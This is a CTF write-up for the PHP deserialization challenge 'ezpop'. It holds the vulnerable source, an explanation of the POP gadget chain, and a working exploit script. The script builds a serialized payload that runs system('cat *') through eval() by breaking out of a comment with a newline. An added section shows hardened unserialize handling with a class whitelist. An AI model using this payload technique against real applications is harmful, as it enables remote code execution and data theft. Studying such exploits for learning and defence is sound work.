dactf web ezpop
阿新 • Published: 2022-03-27
A reproduction of the dactf challenge ezpop.
```php
<?php
class crow {
    public $v1;
    public $v2;
    function eval() {
        echo new $this->v1($this->v2);
    }
    public function __invoke() {
        $this->v1->world();
    }
}

class fin {
    public $f1;
    public function __destruct() {
        echo $this->f1 . '114514';
    }
    public function run() {
        ($this->f1)();
    }
    public function __call($a, $b) {
        echo $this->f1->get_flag();
    }
}

class what {
    public $a;
    public function __toString() {
        $this->a->run();
        return 'hello';
    }
}

class mix {
    public $m1;
    public function run() {
        ($this->m1)();
    }
    public function get_flag() {
        eval('#' . $this->m1);
    }
}

if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
} else {
    highlight_file(__FILE__);
}
```
This is a POP chain challenge.
First, let's work out how the magic methods relate to one another.
`__destruct` is the entry point. Because `f1` is concatenated as a string there, `__toString` is triggered, so `f1` must be an instance of `what`. Inside `what::__toString`, `run()` is called on `a`; both `fin` and `mix` have a `run()` method, so there are two possible routes here, and we take `mix`, making `a` a `mix` instance. `mix::run` then calls `m1` as a function, which clearly triggers `__invoke`, so `m1` is a `crow` instance. `crow::__invoke` calls the nonexistent method `world()` on `v1`, which triggers `__call`, so `v1` is a second `fin` instance, and `fin::__call` in turn calls `get_flag()` on its `f1`, which is a second `mix` instance. `get_flag()` passes a string prefixed with the comment marker `#` to `eval()`, so we start the payload with `\n` to end the comment before our code. Below is my exploit.
```php
<?php
// Same gadget classes as the challenge source
class crow {
    public $v1;
    public $v2;
    function eval() {
        echo new $this->v1($this->v2);
    }
    public function __invoke() {
        $this->v1->world();
    }
}

class fin {
    public $f1;
    public function __destruct() {
        echo $this->f1 . '114514';
    }
    public function run() {
        ($this->f1)();
    }
    public function __call($a, $b) {
        echo $this->f1->get_flag();
    }
}

class what {
    public $a;
    public function __toString() {
        $this->a->run();
        return 'hello';
    }
}

class mix {
    public $m1;
    public function run() {
        ($this->m1)();
    }
    public function get_flag() {
        eval('#' . $this->m1);
    }
}

// Chain: fin::__destruct -> what::__toString -> mix::run -> crow::__invoke
//        -> fin::__call -> mix::get_flag -> eval()
$fin  = new fin();
$fin1 = new fin();
$what = new what();
$mix  = new mix();
$mix1 = new mix();
$crow = new crow();

$fin->f1  = $what;   // string concatenation in __destruct triggers what::__toString
$what->a  = $mix;    // $this->a->run() calls mix::run
$mix->m1  = $crow;   // ($this->m1)() triggers crow::__invoke
$crow->v1 = $fin1;   // $this->v1->world() does not exist, triggers fin::__call
$fin1->f1 = $mix1;   // __call echoes $this->f1->get_flag()
$mix1->m1 = "\nsystem('cat *');";   // the newline ends the '#' comment inside eval()

echo urlencode(serialize($fin));
?>
```
After dumping all the files, the flag is found in the page source.
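The whole chain exists only because the handler calls `unserialize()` on attacker-controlled `$_POST['cmd']` with every class in scope allowed. The following is an added example (not part of the original writeup or the challenge code) showing the defensive side: a coarse scan that logs which classes a payload tries to instantiate, and the hardened `unserialize()` call that turns any non-whitelisted object into `__PHP_Incomplete_Class`, which has none of the magic methods the chain relies on. The function names `serialized_class_names`, `unexpected_classes` and `safe_unserialize`, and the sample payload, are assumptions made for this demonstration.

```php
<?php
// Added example, not from the original page: hardened handling of serialized
// input. Function names and the sample payload below are assumptions.

// Same gadget class as the challenge: its __destruct is the chain's entry point.
class fin {
    public $f1;
    public function __destruct() {
        echo $this->f1 . '114514';
    }
}

// Every object in PHP's serialization format appears as O:<len>:"<class>": or
// C:<len>:"<class>":. This coarse scan pulls the class names out of the raw
// request so it can be logged or alerted on before anything is instantiated.
// (String values can contain the same token, so treat this as a log signal;
// the authoritative guard is allowed_classes below.)
function serialized_class_names(string $data): array {
    preg_match_all('/[OC]:\d+:"([^"]+)":/', $data, $m);
    return array_values(array_unique($m[1]));
}

// Class names in the payload that the application does not expect.
function unexpected_classes(string $data, array $allowed): array {
    return array_values(array_diff(serialized_class_names($data), $allowed));
}

// Hardened replacement for unserialize($_POST['cmd']). Any object whose class
// is not in $allowed is rebuilt as __PHP_Incomplete_Class, which defines no
// __destruct, __toString, __invoke or __call, so no gadget method can run.
// An empty whitelist means "no objects at all", the right default for an
// endpoint that only ever needs scalars and arrays.
function safe_unserialize(string $data, array $allowed = []) {
    $bad = unexpected_classes($data, $allowed);
    if ($bad) {
        error_log('unserialize: unexpected classes in payload: ' . implode(',', $bad));
    }
    return unserialize($data, ['allowed_classes' => $allowed]);
}

// Constructed sample: a minimal serialized `fin` whose f1 is a plain string.
$sample = 'O:3:"fin":1:{s:2:"f1";s:5:"hello";}';

// Vulnerable form (the challenge's sink): the object really is a `fin`, so its
// __destruct runs when the script ends, i.e. attacker data drives code paths.
$unsafe = unserialize($sample);
var_dump(get_class($unsafe));

// Hardened form: the class is reported, and the object that comes back carries
// no behaviour at all.
var_dump(serialized_class_names($sample));
$safe = safe_unserialize($sample);
var_dump(get_class($safe));
var_dump($safe instanceof __PHP_Incomplete_Class);
```

When the input never legitimately needs to be an object, `json_decode($data, true)` removes this whole bug class, since JSON cannot name a PHP class at all; `allowed_classes` is the fallback when a serialized format must be kept for compatibility.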
Damn, HackBar screwed me over badly: its POST URL encoding automatically added a newline, so I couldn't get it to work no matter what. Better to just use Burp (bp) instead.